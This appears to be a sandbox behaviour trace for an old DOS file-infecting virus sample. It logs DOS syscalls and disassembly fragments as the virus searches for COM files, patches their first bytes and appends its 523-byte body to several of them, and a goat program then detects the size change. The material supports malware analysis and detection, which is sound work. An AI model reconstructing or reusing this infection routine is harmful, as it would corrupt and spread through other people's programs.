Sample viewer

vx.netlux.org/Virus.DOS.Champaigne.523

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:20:53.510935429Z 42 PC: 140f8 | Get date 0x140f8: mov byte ptr ds:[bp + 0x2c5], dl
0x140fd: mov byte ptr ds:[bp + 0x2c4], dh
0x14102: mov byte ptr ds:[bp + 0x2c3], al
0x14107: cmp al, 0
0x14109: je 0x14115
0x1410b: mov di, 0x100
0x1410e: lea si, word ptr [bp + 0x28b]
0x14112: push di
0x14113: movsw word ptr es:[di], word ptr [si]
0x14114: movsw word ptr es:[di], word ptr [si]
0x14115: lea dx, word ptr [bp + 0x2e5]
0x14119: call 0x1421c
0x1411c: jmp 0x14207
0x1411f: cmp byte ptr ds:[bp + 0x2c5], 0x18
0x14125: jne 0x14132
0x14127: call 0x14159
0x1412a: cmp byte ptr ds:[bp + 0x2c4], 6
0x14130: je 0x14150
0x14132: mov dx, 0x80
0x14135: call 0x1421c
2018-12-17T22:20:53.514087972Z 26 PC: 14220 | Set disk transfer address
2018-12-17T22:20:53.515358158Z 78 PC: 14212 | Find first file
2018-12-17T22:20:53.521401362Z 61 PC: 14177 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:20:53.529372889Z 87 PC: 1417d | Get or set file date and time
2018-12-17T22:20:53.53098872Z 63 PC: 1418a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:20:53.543809095Z 66 PC: 14226 | Move file pointer
2018-12-17T22:20:53.546078235Z 66 PC: 14226 | Move file pointer
2018-12-17T22:20:53.548345363Z 64 PC: 14261 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:20:53.557713592Z 66 PC: 14226 | Move file pointer
2018-12-17T22:20:53.559576819Z 44 PC: 141bd | Get time 0x141bd: mov word ptr ds:[bp + 0x2d0], dx
0x141c2: mov cx, 0x12
0x141c5: lea di, word ptr [bp + 0x310]
0x141c9: lea si, word ptr [bp + 0x2d2]
0x141cd: push cx
0x141ce: push si
0x141cf: rep movsb byte ptr es:[di], byte ptr [si]
0x141d1: cmp byte ptr ds:[bp + 0x2c3], 0
0x141d7: jne 0x141e5
0x141d9: mov cx, 0xd
0x141dc: lea si, word ptr [bp + 0x250]
0x141e0: rep movsb byte ptr es:[di], byte ptr [si]
0x141e2: jmp 0x141ee
0x141e4: nop
0x141e5: mov cx, 0xb
0x141e8: lea si, word ptr [bp + 0x164]
0x141ec: rep movsb byte ptr es:[di], byte ptr [si]
0x141ee: pop si
0x141ef: pop cx
0x141f0: rep movsb byte ptr es:[di], byte ptr [si]
2018-12-17T22:20:53.562781067Z 64 PC: 1430e | Write file or device (Write 523 bytes on handle 5)
2018-12-17T22:20:53.576762579Z 87 PC: 141ff | Get or set file date and time
2018-12-17T22:20:53.578988422Z 62 PC: 14203 | Close file
2018-12-17T22:20:53.587792505Z 79 PC: 14212 | Find next file
2018-12-17T22:20:53.590694671Z 61 PC: 14177 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:20:53.597426383Z 87 PC: 1417d | Get or set file date and time
2018-12-17T22:20:53.599791201Z 63 PC: 1418a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:20:53.606399563Z 87 PC: 141ff | Get or set file date and time
2018-12-17T22:20:53.608151639Z 62 PC: 14203 | Close file
2018-12-17T22:20:53.616138883Z 79 PC: 14212 | Find next file
2018-12-17T22:20:53.618897846Z 61 PC: 14177 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:20:53.626156557Z 87 PC: 1417d | Get or set file date and time
2018-12-17T22:20:53.628312725Z 63 PC: 1418a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:20:53.634805714Z 66 PC: 14226 | Move file pointer
2018-12-17T22:20:53.636176916Z 66 PC: 14226 | Move file pointer
2018-12-17T22:20:53.638177572Z 64 PC: 14261 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:20:53.641050388Z 66 PC: 14226 | Move file pointer
2018-12-17T22:20:53.642667333Z 44 PC: 141bd | Get time 0x141bd: mov word ptr ds:[bp + 0x2d0], dx
0x141c2: mov cx, 0x12
0x141c5: lea di, word ptr [bp + 0x310]
0x141c9: lea si, word ptr [bp + 0x2d2]
0x141cd: push cx
0x141ce: push si
0x141cf: rep movsb byte ptr es:[di], byte ptr [si]
0x141d1: cmp byte ptr ds:[bp + 0x2c3], 0
0x141d7: jne 0x141e5
0x141d9: mov cx, 0xd
0x141dc: lea si, word ptr [bp + 0x250]
0x141e0: rep movsb byte ptr es:[di], byte ptr [si]
0x141e2: jmp 0x141ee
0x141e4: nop
0x141e5: mov cx, 0xb
0x141e8: lea si, word ptr [bp + 0x164]
0x141ec: rep movsb byte ptr es:[di], byte ptr [si]
0x141ee: pop si
0x141ef: pop cx
0x141f0: rep movsb byte ptr es:[di], byte ptr [si]
2018-12-17T22:20:53.646264198Z 64 PC: 1430e | Write file or device (Write 523 bytes on handle 5)
2018-12-17T22:20:53.654418532Z 87 PC: 141ff | Get or set file date and time
2018-12-17T22:20:53.656197483Z 62 PC: 14203 | Close file
2018-12-17T22:20:53.664686986Z 79 PC: 14212 | Find next file
2018-12-17T22:20:53.669384884Z 61 PC: 14177 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:20:53.67572049Z 87 PC: 1417d | Get or set file date and time
2018-12-17T22:20:53.677192777Z 63 PC: 1418a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:20:53.683899125Z 87 PC: 141ff | Get or set file date and time
2018-12-17T22:20:53.685673182Z 62 PC: 14203 | Close file
2018-12-17T22:20:53.693616894Z 79 PC: 14212 | Find next file
2018-12-17T22:20:53.697129764Z 61 PC: 14177 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:20:53.703801486Z 87 PC: 1417d | Get or set file date and time
2018-12-17T22:20:53.705443757Z 63 PC: 1418a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:20:53.712300427Z 87 PC: 141ff | Get or set file date and time
2018-12-17T22:20:53.713944713Z 62 PC: 14203 | Close file
2018-12-17T22:20:53.721009931Z 79 PC: 14212 | Find next file
2018-12-17T22:20:53.724236232Z 61 PC: 14177 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:20:53.730881109Z 87 PC: 1417d | Get or set file date and time
2018-12-17T22:20:53.732470368Z 63 PC: 1418a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:20:53.739505671Z 66 PC: 14226 | Move file pointer
2018-12-17T22:20:53.741182448Z 66 PC: 14226 | Move file pointer
2018-12-17T22:20:53.74280247Z 64 PC: 14261 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:20:53.746636613Z 66 PC: 14226 | Move file pointer
2018-12-17T22:20:53.748296067Z 44 PC: 141bd | Get time 0x141bd: mov word ptr ds:[bp + 0x2d0], dx
0x141c2: mov cx, 0x12
0x141c5: lea di, word ptr [bp + 0x310]
0x141c9: lea si, word ptr [bp + 0x2d2]
0x141cd: push cx
0x141ce: push si
0x141cf: rep movsb byte ptr es:[di], byte ptr [si]
0x141d1: cmp byte ptr ds:[bp + 0x2c3], 0
0x141d7: jne 0x141e5
0x141d9: mov cx, 0xd
0x141dc: lea si, word ptr [bp + 0x250]
0x141e0: rep movsb byte ptr es:[di], byte ptr [si]
0x141e2: jmp 0x141ee
0x141e4: nop
0x141e5: mov cx, 0xb
0x141e8: lea si, word ptr [bp + 0x164]
0x141ec: rep movsb byte ptr es:[di], byte ptr [si]
0x141ee: pop si
0x141ef: pop cx
0x141f0: rep movsb byte ptr es:[di], byte ptr [si]
2018-12-17T22:20:53.750899074Z 64 PC: 1430e | Write file or device (Write 523 bytes on handle 5)
2018-12-17T22:20:53.760127881Z 87 PC: 141ff | Get or set file date and time
2018-12-17T22:20:53.761896186Z 62 PC: 14203 | Close file
2018-12-17T22:20:53.769592208Z 79 PC: 14212 | Find next file
2018-12-17T22:20:53.772894786Z 61 PC: 14177 | Open file (Filename = 'PAH.COM')
2018-12-17T22:20:53.779534405Z 87 PC: 1417d | Get or set file date and time
2018-12-17T22:20:53.781087068Z 63 PC: 1418a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:20:53.788180047Z 87 PC: 141ff | Get or set file date and time
2018-12-17T22:20:53.789641162Z 62 PC: 14203 | Close file
2018-12-17T22:20:53.797309736Z 79 PC: 14212 | Find next file
2018-12-17T22:20:53.800719287Z 61 PC: 14177 | Open file (Filename = 'TEST.COM')
2018-12-17T22:20:53.80776619Z 87 PC: 1417d | Get or set file date and time
2018-12-17T22:20:53.809620868Z 63 PC: 1418a | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:20:53.813189821Z 87 PC: 141ff | Get or set file date and time
2018-12-17T22:20:53.815186565Z 62 PC: 14203 | Close file
2018-12-17T22:20:53.82490191Z 79 PC: 14212 | Find next file
2018-12-17T22:20:53.829510218Z 26 PC: 14220 | Set disk transfer address
2018-12-17T22:20:53.831104088Z 48 PC: 12a63 | Get DOS version
2018-12-17T22:20:53.832494724Z 9 PC: 12a7a | Display string (String= ' --=[ Selfchecking AntiStealth Goat COM/EXE file, 01/06/01 ]=------------------ (c) 1995-2001 by ROSE SWE, Dipl.-Ing. Ralph Roth - Version 1.18 - Freeware ')
2018-12-17T22:20:53.842899496Z 61 PC: 12cb7 | Open file (Filename = '')
2018-12-17T22:20:53.850080686Z 9 PC: 12a88 | Display string (String= 'Self test: ')
2018-12-17T22:20:53.852676686Z 93 PC: 12b24 | File sharing functions
2018-12-17T22:20:53.855332498Z 9 PC: 12b03 | Display string (String= 'Size change=+020Bh/00523d. Virus might be activ? ')
2018-12-17T22:20:53.860894152Z 76 PC: 12b09 | Terminate with return code (Return code = '1')